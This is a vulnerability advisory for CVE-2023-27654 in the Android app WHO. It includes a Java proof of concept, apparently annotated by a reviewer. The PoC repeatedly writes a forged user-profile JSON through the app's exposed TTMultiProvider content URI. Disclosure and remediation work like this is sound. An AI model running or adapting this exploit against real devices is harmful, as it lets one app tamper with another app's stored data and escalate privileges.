Escalation of privileges in WHO (CVE-2023-27654)
Vendor: WHO (https://www.whoapp.live/)
Affected product: Who (com.scorp.who)
Versions: 1.0.28, 1.0.30, 1.0.32
Download link: https://play.google.com/store/apps/details?id=com.scorp.who
Description of the vulnerability for use in the CVE: An issue found in WHO v.1.0.28, v.1.0.30, and v.1.0.32 allows an attacker to cause an escalation of privileges via the TTMultiProvider component.
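PoC (Android, Java): a method that writes to a TTMultiProvider content URI through ContentResolver.update():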
/**
 * Proof-of-concept from the advisory: repeatedly calls {@code ContentResolver.update()} on a
 * content URI under the {@code com.scorp.who.TTMultiProvider} authority, supplying a
 * caller-chosen {@code apiUserProfile} JSON value.
 *
 * <p>NOTE(review): the advisory attributes the privilege escalation to the TTMultiProvider
 * component. Presumably the provider is exported and enforces no write permission, so a
 * different app on the device can reach it; confirm against the affected app's manifest.
 * On the app side the usual remediation is to declare the provider
 * {@code android:exported="false"}, or to protect it with a signature-level permission, and to
 * validate the caller and the requested file name before any write.
 *
 * <p>The loop below has no exit condition, so this method never returns normally.
 */
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
// Assigned but never read in the visible method; getRandomString is defined outside this listing.
String randomString =getRandomString(512);
// Target URI: path "t_sp/contain/zztest" with query "sp_file_name=unityads-installinfo".
// NOTE(review): sp_file_name presumably selects the preferences file the provider operates on; confirm.
Uri uri = Uri.parse("content://com.scorp.who.TTMultiProvider/t_sp/contain/" + "zztest" + "?sp_file_name=unityads-installinfo");
// Unbounded loop: the same update request is issued on every iteration.
while (true) {
ContentValues contentValues = new ContentValues();
// Single key "apiUserProfile" whose value is a serialized user-profile JSON document
// (uid, name, bio, image and video URLs, country, counters).
contentValues.put("apiUserProfile", "{\"is_verified\":false,\"is_favorite\":false,\"uid\":\"FlG4hFCFrxPQMQ2UfejzeJuzoy92\",\"b\":2,\"c\":3,\"d\":0,\"lang\":\"jp\",\"bio\":\"hack\",\"workTitle\":\"hack\",\"workCompany\":\"hack\",\"education\":\"hack\",\"redactedName\":\"T*******\",\"name\":\"hack\",\"ppImageURL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"ppImageID\":\"d8350738-45da-4221-a648-5082259139c5\",\"country\":{\"code\":\"HK\",\"name\":\"Hong Kong SAR China\",\"flag\":\"https://d2veheavfolhls.cloudfront.net/misc%2Fflags%2FHK@3x.png?alt\\u003dmedia\"},\"birthday\":\"1999-11-29T06:22:00.000Z\",\"age\":99,\"popularity\":1000,\"like_count\":-1,\"shared_id\":\"123456789\",\"favorite_count\":0,\"self_favorite_count\":3,\"ppImages\":[{\"ID\":\"d8350738-45da-4221-a648-5082259139c5\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"review_status\":0}],\"profileVideos\":[{\"ID\":\"d4f68235-630c-46b2-b45a-b9716b4ee6da\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pv%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"thumbnailURL\":\"https://d2veheavfolhls.cloudfront.net/pvt%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"review_status\":0}]}");
// Selection clause and selection arguments are both null.
contentResolver.update(uri,contentValues,null,null);
}
}